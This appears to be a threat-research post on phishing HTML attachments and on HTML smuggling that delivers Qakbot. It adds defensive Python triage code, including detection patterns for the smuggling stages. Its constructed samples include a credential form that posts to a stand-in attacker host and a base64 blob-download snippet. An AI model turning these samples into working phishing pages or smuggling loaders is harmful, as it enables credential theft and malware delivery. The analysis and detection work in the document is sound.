Introduction
This past month, Trustwave SpiderLabs observed that HTML (Hypertext Markup Language) file attachments had become a common occurrence in our spam traps. This is not unusual, since malware is often delivered through phishing spam. Over the past 30 days, SpiderLabs found that the combination of .HTML (11.39%) and .HTM (2.7%) files is our second most spammed file attachment type, totaling 14.09%, followed by .EXE files at 12.84%.
Figure 1: HTML file attachment type percentages
These threat actors are phishers whose main purpose is to steal sensitive information (such as login credentials and credit card details) for identity theft, extortion, access to the victim’s finances, purchasing goods or services, and so on.
According to Microsoft, the cybercriminal groups DEV-0238 and DEV-0253 have also been sending HTML attachments that use HTML smuggling to deliver keyloggers, and Microsoft has attributed the use of HTML smuggling to deliver Trickbot malware to the cybercriminal group DEV-0193.
Phishing attacks using HTML attachments
The most common spammed HTML attachments we see are phishing pages. The HTML file itself is generally benign, meaning it does not contain malicious code that executes arbitrary code on the system. The attachment should nevertheless be treated with caution: it mimics the sign-in page of services such as Microsoft, Google or online banking sites, and the danger comes when a user falls for the scam, enters their credentials into the form and submits it.
Figure 2: Samples of phishing email with HTML attachments
Figure 3: HTML attachments that mimic Microsoft sign-in page. The phishing page may also have the target user’s email address hard-coded in the page.
SpiderLabs noticed that recent phishing HTML files contained the hard-coded email address of the target user, which makes the page more convincing to the victim. At the source level, adversaries employ varying degrees of code obfuscation; the JavaScript is usually obfuscated with open-source tools such as JavaScript Obfuscator. The HTML files are not stand-alone, though: they pull additional jQuery library, CSS and JavaScript code from various remote web servers to handle form objects and form actions.
Hard-coding the email address helps trick the victim into believing they had previously signed on to the page, since they only need to enter their password. Overall, this tactic makes the email appear more legitimate.
Below is the HTML source from one of the phishing attacks. It shows the level of JavaScript obfuscation.
Figure 4: Phishing HTML source code
In most instances, the HTML file is not fully autonomous. The JavaScript injected as inline scripts is usually loaded from remote servers: a mixture of legitimate CDN (content delivery network) hosts and hosts operated by the actors. The JavaScript that handles the data exfiltration is usually hosted on a web server owned or operated by the actor.
Figure 5: Inspecting the HTML source shows the JavaScript files it pulls from the remote web server.
Figure 6: JavaScript code loaded from the remote host (valdia.quatiappcn.pw) by the HTML attachment file. It handles additional HTML DOM form actions, jQuery objects and CSS styling, as well as anti-debugging and URL form checking.
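To triage an attachment of the kind described above, the first questions are which remote hosts it pulls code from, where a submitted password would be posted, and whether a victim's email address is pre-filled. The following is an added defender-side example (not code from the report or from Trustwave) using Python's standard-library HTML parser; the sample page and the host actor-host.invalid are constructed placeholders, while the jQuery CDN URL is one the report lists.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

class ResourceParser(HTMLParser):
    """Collect remote resources, credential forms and pre-filled emails."""
    def __init__(self):
        super().__init__()
        self.resources = []        # (tag, url) for every remote script/stylesheet/frame
        self.form_actions = []     # action URLs of forms containing a password field
        self.prefilled_emails = []
        self._form = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag in ("script", "iframe") and a.get("src"):
            self.resources.append((tag, a["src"]))
        elif tag == "link" and a.get("href"):
            self.resources.append((tag, a["href"]))
        elif tag == "form":
            self._form = {"action": a.get("action", ""), "password": False}
        elif tag == "input" and self._form is not None:
            if a.get("type") == "password":
                self._form["password"] = True
            elif a.get("type") == "email" and a.get("value"):
                self.prefilled_emails.append(a["value"])

    def handle_endtag(self, tag):
        if tag == "form" and self._form is not None:
            if self._form["password"]:
                self.form_actions.append(self._form["action"])
            self._form = None

def triage_phish(html: str) -> dict:
    """Summarise where the attachment loads code from and where credentials would go."""
    p = ResourceParser()
    p.feed(html)
    hosts = sorted({urlparse(u).netloc for _, u in p.resources if urlparse(u).netloc})
    exfil = sorted({urlparse(u).netloc for u in p.form_actions if urlparse(u).netloc})
    return {"remote_hosts": hosts, "credential_post_hosts": exfil,
            "prefilled_emails": p.prefilled_emails}

# Constructed sample in the shape described above; actor-host.invalid is a placeholder.
PHISH_SAMPLE = """<html><head>
<link rel="stylesheet" href="https://actor-host.invalid/themes/css/main.css">
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
<script src="https://actor-host.invalid/theme.js"></script></head><body>
<form method="post" action="https://actor-host.invalid/post.php">
<input type="email" name="login" value="victim@example.test" readonly>
<input type="password" name="passwd"></form></body></html>"""
```

Hosts that appear only under credential_post_hosts, and not among well-known CDNs, are the ones worth blocking and hunting for in proxy logs.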
Malware Delivery using HTML smuggling
To evade email gateways, adversaries use a technique called HTML smuggling to deliver a malware binary to the target user. The method relies on HTML5 features that work offline: the binary is stored as an immutable blob of data embedded in JavaScript code. When the file is opened in a web browser, the data blob is decoded into a file object and a download notification bar is displayed to the user. Combined with social engineering, this lures the target user into saving the binary to disk and opening it.
The screenshot below is an example of a spam campaign with an HTML file attachment.
Figure 7: An example of a Qakbot spam campaign that uses HTML file attachment
When loaded in a browser, the HTML file runs JavaScript that makes it appear as though a file was downloaded from a remote web server. The ZIP file, however, is smuggled within the HTML source as a data blob, which the JavaScript decodes and converts into a ZIP file.
Figure 8: File smuggling
The HTML source would look something like the screenshot below:
Figure 8.1: HTML source example
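The smuggling chain described above has three recognisable stages in the source (a base64 decode, a Blob construction and a download trigger) plus the embedded blob itself. The following added example (not code from the report or from Trustwave) triages an attachment for those stages, decodes any embedded blob and labels it by its leading magic bytes, so an analyst can see what would have landed on disk without opening the file in a browser. The HTML sample and its 23-byte blob are constructed; the blob merely begins with the ZIP signature and is not a real archive.

```python
import base64
import re

# Indicator patterns for the three stages: decode, Blob construction, download trigger.
INDICATORS = {
    "decode": re.compile(r"\batob\s*\(|Uint8Array"),
    "blob": re.compile(r"new\s+Blob\s*\("),
    "download": re.compile(r"URL\.createObjectURL|msSaveOrOpenBlob|\bdownload\s*="),
}
# Quoted base64 literals long enough to carry a file rather than a short token.
B64_LITERAL = re.compile(r"""['"]([A-Za-z0-9+/]{20,}={0,2})['"]""")
MAGIC = {b"PK\x03\x04": "zip", b"MZ": "pe", b"%PDF": "pdf", b"\x7fELF": "elf"}

def classify_payload(data: bytes) -> str:
    """Label the decoded blob by its leading magic bytes."""
    for magic, kind in MAGIC.items():
        if data.startswith(magic):
            return kind
    return "unknown"

def extract_payloads(html: str) -> list[dict]:
    """Decode every base64 literal that parses cleanly and label its file type."""
    found = []
    for literal in B64_LITERAL.findall(html):
        try:
            data = base64.b64decode(literal, validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        found.append({"type": classify_payload(data), "size": len(data)})
    return found

def triage(html: str) -> dict:
    """Return matched indicators, decoded payloads and a verdict for one attachment."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(html)]
    payloads = extract_payloads(html)
    if len(hits) == 3 and payloads:      # full chain plus an embedded blob
        verdict = "likely HTML smuggling"
    elif hits or payloads:
        verdict = "suspicious"
    else:
        verdict = "no smuggling indicators"
    return {"indicators": hits, "payloads": payloads, "verdict": verdict}

# Constructed sample in the shape described above (not one of the report's files);
# the blob is 23 harmless bytes that merely begin with the ZIP magic "PK\x03\x04".
SMUGGLE_SAMPLE = """<html><body><script>var f='UEsDBBQAAAAIAAAAIQBkdW1teS50eHQ=';
var b=Uint8Array.from(atob(f),c=>c.charCodeAt(0));var blob=new Blob([b],{type:'application/zip'});
var a=document.createElement('a');a.href=URL.createObjectURL(blob);a.download='ScannedDocuments.zip';a.click();
</script></body></html>"""
```

Real samples obfuscate the JavaScript, so the string patterns will miss renamed or split calls; the decoded-blob check is the more robust signal because the payload bytes must survive intact.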
Shown below is the attack flow overview:
Figure 9: Attack flow overview
Conclusion
As you can see, obfuscation is the common denominator of these spammed HTML attachments. This shows how difficult it is to detect this kind of threat at the email gateway layer. Although HTML files are usually benign when opened, the danger lies in the user’s subsequent action. Coupled with social engineering, this is what makes this type of attack successful.
IOCs
URLs
Hashes